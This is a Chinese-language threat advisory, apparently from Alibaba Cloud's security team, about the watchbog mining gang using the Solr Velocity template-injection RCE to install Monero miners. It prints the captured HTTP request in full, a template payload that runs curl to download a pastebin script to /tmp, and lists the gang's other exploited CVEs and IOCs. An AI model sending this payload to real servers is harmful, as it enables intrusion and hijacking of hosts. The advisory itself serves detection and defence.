威脅預警|Solr velocity模板注入遠程命令執行已加入watchbog武器庫,漏洞修補時間窗口愈來愈短
概述
近日,阿里雲安全團隊監測到挖礦團伙watchbog更新了其使用的武器庫,增長了最新Solr Velocity 模板注入遠程命令執行漏洞的攻擊方式,攻擊成功後會下載門羅幣挖礦程序進行牟利。建議用戶及時排查自身主機是否受到影響。java
值得注意的是,此漏洞利用代碼於10月31日被公佈,11月2日阿里雲安全團隊就已發現watchbog團伙利用此漏洞進行入侵,植入木馬進行挖礦,漏洞公開不足2日便被挖礦團伙利用進行攻擊牟利。能夠看到,當新的漏洞被披露出來時,可供企業用戶修復的時間窗口愈來愈短,所以防守方須要及時地關注新披露可利用漏洞,以及採起緩解措施或進行修復,必要時可考慮選用安全產品幫助保障安全。shell
背景介紹
watchbog挖礦團伙
watchbog團伙最先出現於2018年,是一個利用多種漏洞攻擊方式向目標主機植入挖礦木馬的惡意團伙,經過挖取門羅幣牟利並維持C&C通訊以供團伙後續動做。自出現後更新頻繁,一直在嘗試利用最新的漏洞進行攻擊。安全
Solr Velocity 模板注入遠程命令執行漏洞
Apache Solr是開源企業搜索平臺,主要包括全文搜索、動態聚類、富文本處理等功能。在2019年10月31日,國外安全研究員公開了Solr Velocity模板注入的POC。此漏洞存在於Solr默認集成組件Solr.VelocityResponseWriter中,參數params.resource.loader.enabled能夠控制是否根據請求參數來加載指定模板,雖然默認爲false,但攻擊者能夠經過發送/[core_name]/config來手動設置此參數的開啓,以後即可構造惡意請求執行指令。bash
攻擊者首先能夠經過[core_admin]獲取服務器core_name,以後經過發送如下命令將加載模板指令打開。服務器
開啓從參數指定模板後,攻擊者即可以發送惡意代碼從而進行惡意行爲。curl
惡意腳本分析
11月2日,阿里雲安全團隊發現有攻擊者利用Solr Velocity漏洞發起入侵,其會向受到此漏洞影響的主機發送如下數據:ide
GET /solr/scalebay_2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='')+#set($rt=$x.class.forName('java.lang.Runtime'))+#set($chr=$x.class.forName('java.lang.Character'))+#set($str=$x.class.forName('java.lang.String'))+#set($ex=$rt.getRuntime().exec('curl -fsSL https://pastebin.com/raw/dhQaGbMa -o /tmp/baby'))+$ex.waitFor()+#set($out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)複製代碼
跟進其使用的腳本 pastebin.com/raw/dhQaGbM…,此腳本格式內容與阿里雲安全團隊以前捕獲的watchbog惡意腳本內容格式基本一致,(可參考以前阿里雲安全針對watchbog的分析文章,參考文末相關連接),能夠確認爲同一團伙所爲,腳本相同內容再也不贅述。除了新增了Solr Velocity攻擊方式外,其新增了cleanoldpack函數用以清除舊版木馬以及其餘惡意團伙惡意程序,可見黑產之間的相互競爭也很是激烈。函數
其餘攻擊方式
| 序號 | 攻擊方式 |
|---|---|
| 1 | Solr dataimport RCE(CVE-2019-0193) |
| 2 | Nexus Repository Manager(CVE_2019_5475) |
| 3 | Windows blueKeep RDP RCE (CVE-2019-0708) |
| 4 | JIRA模板注入(CVE-2019-11581) |
| 5 | Exim Mail Server 遠程命令執行(CVE-2019-10149) |
| 6 | Solr 實體注入 (CVE-2017-12629) |
| 7 | Couchdb 遠程命令執行(CVE-2018-8007) |
| 8 | Nexus Repository Manager 3 遠程命令執行(CVE-2019-7238) |
| 9 | Jenkins 遠程命令執行(CVE-2018-1000861) |
| 10 | Redis未受權訪問、Redis任意lua字節碼執行(CVE-2015-4335) |
IOC
pastebin[.]com/raw/dhQaGbMa
pastebin[.]com/raw/9QVpd02i
pastebin[.]com/raw/6HtLs31b網站
MD5:
9f63e1105214ea94766d8c2fe2ba0da0阿里雲
安全建議
- 截止完成此稿,目前官方還未發佈任何補丁,建議用戶採用白名單策略限制與solr應用通訊對象,並時刻關注官方對於此漏洞的反應。
- 建議使用阿里雲安全的下一代雲防火牆產品,其阻斷惡意外聯、可以配置智能策略的功能,可以有效幫助防護入侵。哪怕攻擊者在主機上的隱藏手段再高明,下載、挖礦、反彈shell這些操做,都須要進行惡意外聯;雲防火牆的攔截將完全阻斷攻擊鏈。此外,用戶還能夠經過自定義策略,直接屏蔽惡意網站,達到阻斷入侵的目的。此外,雲防火牆獨有的虛擬補丁功能,可以幫助客戶更靈活、更「無感」地阻斷攻擊。
- 對於有更高定製化要求的用戶,能夠考慮使用阿里雲安全管家服務。購買服務後將有經驗豐富的安全專家提供諮詢服務,定製適合您的方案,幫助加固系統,預防入侵。入侵事件發生後,也可介入直接協助入侵後的清理、事件溯源等,適合有較高安全需求的用戶,或未僱傭安全工程師,但但願保障系統安全的企業。
- 1. 漏洞預警:Apache Solr 遠程代碼執行漏洞
- 2. CVE-2019-0193 Apache solr velocity模塊漏洞&命令執行
- 3. Oracle WebLogic遠程命令執行漏洞預警
- 4. Apache Solr Velocity模板注入RCE漏洞復現
- 5. Apache Solr velocity模板注入RCE漏洞復現
- 6. 【漏洞預警】Redis 4.x/5.x 遠程命令執行高危漏洞
- 7. Samba遠程Shell命令注入執行漏洞(CVE-2007-2447)
- 8. 漏洞預警Gitlab Wiki API 遠程代碼執行漏洞
- 9. 【漏洞復現】Apache Solr via Velocity template遠程代碼執行
- 10. Apache SSI 遠程命令執行漏洞
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • ionic 模態窗口 - ionic 教程
- • YAML 入門教程
- • Docker 清理命令
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 漏洞預警:Apache Solr 遠程代碼執行漏洞
- 2. CVE-2019-0193 Apache solr velocity模塊漏洞&命令執行
- 3. Oracle WebLogic遠程命令執行漏洞預警
- 4. Apache Solr Velocity模板注入RCE漏洞復現
- 5. Apache Solr velocity模板注入RCE漏洞復現
- 6. 【漏洞預警】Redis 4.x/5.x 遠程命令執行高危漏洞
- 7. Samba遠程Shell命令注入執行漏洞(CVE-2007-2447)
- 8. 漏洞預警Gitlab Wiki API 遠程代碼執行漏洞
- 9. 【漏洞復現】Apache Solr via Velocity template遠程代碼執行
- 10. Apache SSI 遠程命令執行漏洞